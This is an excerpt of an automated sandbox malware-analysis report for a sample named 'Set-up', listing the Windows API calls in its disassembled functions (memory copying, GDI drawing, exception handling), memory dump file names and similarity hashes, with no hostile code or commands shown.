                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ?tolower@?$ctype@_W@std@@realloc$Xbad_alloc@std@@
                                                                                          • String ID:
                                                                                          • API String ID: 519369520-0
                                                                                          • Opcode ID: 115e60fade84f5c06635c0d53106a6c2b4be3c5900a573550603b1066543d9f0
                                                                                          • Instruction ID: d13660892d0d71d1eea2c7ab4bc361666cc84a52b9e55f049fd4777d5442cf50
                                                                                          • Opcode Fuzzy Hash: 115e60fade84f5c06635c0d53106a6c2b4be3c5900a573550603b1066543d9f0
                                                                                          • Instruction Fuzzy Hash: A65125B17002159FCB18DF19D480AA9BBE1FF48355B15C0AEE89E8B352D732D952CB90
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00C5D8CC), ref: 00A78AAD
                                                                                          • memset.VCRUNTIME140 ref: 00A78ABA
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,00C5D8CC), ref: 00A78AFD
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00C5D8CC), ref: 00A78B05
                                                                                          • memset.VCRUNTIME140 ref: 00A78B10
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset$_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 3375828981-0
                                                                                          • Opcode ID: b563ca64ecdbbd49923aaa081f3860d3a342282dcd005f6ace7e7fcf9ee8026c
                                                                                          • Instruction ID: e6266dfa958991159f6e880d7cd775c520fc3e2331e755328bf8dd090b258bc9
                                                                                          • Opcode Fuzzy Hash: b563ca64ecdbbd49923aaa081f3860d3a342282dcd005f6ace7e7fcf9ee8026c
                                                                                          • Instruction Fuzzy Hash: 8E411772A00118ABCB15DF68DC846AEBBA5EF45390F1586AAF819DB381DF70DD1087A0
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000040), ref: 00A75E8E
                                                                                          • memcpy.VCRUNTIME140(00000010,?,?,00000000,?,00000000,?,?,00000040), ref: 00A75E9C
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000040), ref: 00A75EDF
                                                                                          • memcpy.VCRUNTIME140(00000000,00000040,00000000,?,?,00000040), ref: 00A75EE7
                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,00000040,00000000,?,?,00000040), ref: 00A75EF3
                                                                                            • Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 996696-0
                                                                                          • Opcode ID: ef60f9cd48e2138d247593ee83387c5bc5f738dcbd7b7ddaa12315204eead493
                                                                                          • Instruction ID: 625d561d3186eb00c6728cf138871a110b3db0b541285994514e1dea95c96dbb
                                                                                          • Opcode Fuzzy Hash: ef60f9cd48e2138d247593ee83387c5bc5f738dcbd7b7ddaa12315204eead493
                                                                                          • Instruction Fuzzy Hash: C5411672900509ABCB05DF68DC809AEBBAAEF45350F2482A9F819DB345DBB1DE50C791
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A9646B
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00A91714,?,?,?,?,?,?,?,00A8F55A,?,?), ref: 00A96482
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A96498
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 00A964B8
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A964D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2665656946-0
                                                                                          • Opcode ID: 75a8baeae947244ca2a79d45d1ddc08118c7d4aa21ecd556961bc5ba6eb2eeeb
                                                                                          • Instruction ID: cb043863fa40eed8d96c3e61deb9057d0ffb47fe28ded9645403879b226c1975
                                                                                          • Opcode Fuzzy Hash: 75a8baeae947244ca2a79d45d1ddc08118c7d4aa21ecd556961bc5ba6eb2eeeb
                                                                                          • Instruction Fuzzy Hash: B9310A73600018ABCB14DF5CDD859BEBBA5EFC5351719C269E9188B205EB31E914C7E1
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 00A68473
                                                                                          • memset.VCRUNTIME140 ref: 00A68492
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 00A684A8
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00A684FE
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00A6850F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CreateDeleteFontIndirectMessageSendmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1981032407-0
                                                                                          • Opcode ID: 547462c9fe34e57f7eb79bbdbb2c2ad582cd819db51a8d8064cbab97e64456cd
                                                                                          • Instruction ID: 658812d08721e2922d2ce612b0692ccecd48c51dd820c02cf0ad30aab9eeb997
                                                                                          • Opcode Fuzzy Hash: 547462c9fe34e57f7eb79bbdbb2c2ad582cd819db51a8d8064cbab97e64456cd
                                                                                          • Instruction Fuzzy Hash: D23117B1A00709EFDB14DFA4C845B6ABBB8FF08714F008569E91ADB690DB74E904CB50
                                                                                          APIs
                                                                                          • ?__ExceptionPtrCreate@@YAXPAX@Z.MSVCP140(?,70576E16,?,00000000,?,00A667E0,00000000,?), ref: 00A6B086
                                                                                          • ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(?,00A6B910,?,?,?,00A667E0,00000000,?), ref: 00A6B0A9
                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0C1
                                                                                          • ?__ExceptionPtrToBool@@YA_NPBX@Z.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0E3
                                                                                          • ?_XGetLastError@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception$Bool@@Create@@Destroy@@Error@std@@Execute_once@std@@LastUonce_flag@1@
                                                                                          • String ID:
                                                                                          • API String ID: 1966669179-0
                                                                                          • Opcode ID: 1b4f266e811641144417628fd7d02edb34dbe1697ebf6e7e61b53f2a50d899f0
                                                                                          • Instruction ID: ead89f9e398b38a5b8a8f61a0dcee99193a38efcc146df70d7980a6e933ab2f3
                                                                                          • Opcode Fuzzy Hash: 1b4f266e811641144417628fd7d02edb34dbe1697ebf6e7e61b53f2a50d899f0
                                                                                          • Instruction Fuzzy Hash: 61116DB5C00248ABDF00DFA8D909B9EBBB8EB04714F00456AE902E3251D7759618CBA2
                                                                                          APIs
                                                                                          • __RTDynamicCast.VCRUNTIME140(?,00000000,00C61508,00C61548,00000000), ref: 00A634B5
                                                                                          • CreatePatternBrush.GDI32(?), ref: 00A634C9
                                                                                          • CreateSolidBrush.GDI32(000000FF), ref: 00A634D6
                                                                                          • FillRect.USER32(?,?,?), ref: 00A63522
                                                                                          • DeleteObject.GDI32(?), ref: 00A63529
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: BrushCreate$CastDeleteDynamicFillObjectPatternRectSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3069335187-0
                                                                                          • Opcode ID: aaa5dd3508e4899df3ed5febba6b2c6eb15f3aa5ab4bc903b47ce9fa3f35ef7d
                                                                                          • Instruction ID: 9b06e9788c7659e49e993bb9ed90abe4ed60f306350a3a2182844f4712f83e9e
                                                                                          • Opcode Fuzzy Hash: aaa5dd3508e4899df3ed5febba6b2c6eb15f3aa5ab4bc903b47ce9fa3f35ef7d
                                                                                          • Instruction Fuzzy Hash: 9B111FB1E0030A9BCF10AFA5C84ABAEBFF8EF14711F154065F906A7251DA34DA05CBA1
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A64125
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A6412A
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00A6413F
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A6414C
                                                                                          • Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00A64181
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BrushCreateDeleteEllipseSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3360253338-0
                                                                                          • Opcode ID: eb2b63b58800b880748b7b610b17e79c34bd8286446d345610d34070b6e966a1
                                                                                          • Instruction ID: 2eda2740cf086e28070e0438d70a0ef1e17e95e13765cf043583726c22769916
                                                                                          • Opcode Fuzzy Hash: eb2b63b58800b880748b7b610b17e79c34bd8286446d345610d34070b6e966a1
                                                                                          • Instruction Fuzzy Hash: 64110775900208AFCF00AFA1D88AA6A7FB5EF58310F1240A5FD059B226D735DD69CFA0
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63385
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A6338A
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00A6339F
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A633AC
                                                                                          • Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00A633E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BrushCreateDeleteRectangleSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3123465668-0
                                                                                          • Opcode ID: b287186ada697777be552f9d6efa98ff25b6ad8e26a38775a8300cb3316b3e8f
                                                                                          • Instruction ID: d9681f4784df2aa8267d63bfe5eb5628ccf93d79d7d6e2c40e11b75195fd14ad
                                                                                          • Opcode Fuzzy Hash: b287186ada697777be552f9d6efa98ff25b6ad8e26a38775a8300cb3316b3e8f
                                                                                          • Instruction Fuzzy Hash: F2110775900208EFCF00AFA1D88AA6A7FB5EF48310F1240A5FD059B226D735DD69CFA0
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63579
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A63582
                                                                                          • CreateSolidBrush.GDI32(?), ref: 00A63597
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A635A4
                                                                                          • RoundRect.GDI32(?,00000001,00000000,-00000001,00000000,00000008,00000008), ref: 00A635DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BrushCreateDeleteRectRoundSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1288606822-0
                                                                                          • Opcode ID: d405cdc8a8aff9bc735cfb7218bf9fc2e2398b77c9b2ecf8552379a271860d42
                                                                                          • Instruction ID: 75f99c998dee7ce54065e60d81c09f634b42bc8fd18c5a2f3906256a333d733b
                                                                                          • Opcode Fuzzy Hash: d405cdc8a8aff9bc735cfb7218bf9fc2e2398b77c9b2ecf8552379a271860d42
                                                                                          • Instruction Fuzzy Hash: AE11F87140460ABFDB00AF61DC09B6ABBB5FF14311F118154F94693660CB35AAAACFD0
                                                                                          APIs
                                                                                          • __RTDynamicCast.VCRUNTIME140(?,00000000,00C61508,00C61548,00000000), ref: 00A630DD
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00A630EA
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00A63100
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A6310D
                                                                                          • SetTextAlign.GDI32(?,00000018), ref: 00A6311B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: CompatibleCreate$AlignBitmapCastDynamicObjectSelectText
                                                                                          • String ID:
                                                                                          • API String ID: 96065740-0
                                                                                          • Opcode ID: 5285740ea283e3b0760ab1321dd70dc3f719172ac45111939a346474c2c9773c
                                                                                          • Instruction ID: a47170dc44d52326a018abf5dc7d8196eafb69214c44c70820b2710c5edcb93f
                                                                                          • Opcode Fuzzy Hash: 5285740ea283e3b0760ab1321dd70dc3f719172ac45111939a346474c2c9773c
                                                                                          • Instruction Fuzzy Hash: EC113C35500605AFCB109FA2DC08F6AFFA5FF48312F048565F95A836A1CB71A860DB90
                                                                                          APIs
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00A67F9D
                                                                                          • SelectObject.GDI32(00000000), ref: 00A67FAB
                                                                                          • StretchBlt.GDI32(00000000,?,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00A67FD0
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00A67FD8
                                                                                          • DeleteDC.GDI32(00000000), ref: 00A67FDF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$CompatibleCreateDeleteStretch
                                                                                          • String ID:
                                                                                          • API String ID: 732282326-0
                                                                                          • Opcode ID: 992231cd7cd377b128cffb33929f9671ed3cdde0fc7fd33ae4409ed39d8d26dc
                                                                                          • Instruction ID: da0ef55e14c8e3709b755814b890deb58c6ee1cf9fef4fca9227c707a22b194d
                                                                                          • Opcode Fuzzy Hash: 992231cd7cd377b128cffb33929f9671ed3cdde0fc7fd33ae4409ed39d8d26dc
                                                                                          • Instruction Fuzzy Hash: 99F03AB1210304BBE7245BA5DC8EF6F7AACDB08265F110158BE0ED6291EAA0AC00C6A4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color
                                                                                          • String ID: 2
                                                                                          • API String ID: 2811717613-450215437
                                                                                          • Opcode ID: 63c6e8a7f45406fe5b7ecc2d290405f4dc31e3faa7fc93b8d4c282db398e154b
                                                                                          • Instruction ID: 3fe34329dd6c84972f2059874c4f36751b79f152f655f88e572b5ddcd21ba5b0
                                                                                          • Opcode Fuzzy Hash: 63c6e8a7f45406fe5b7ecc2d290405f4dc31e3faa7fc93b8d4c282db398e154b
                                                                                          • Instruction Fuzzy Hash: 90D1B1B0205B42AFE355CF24C158796FBE0BF44308F14465CE5A85B782C7BAA569CFD2
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A7C76D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
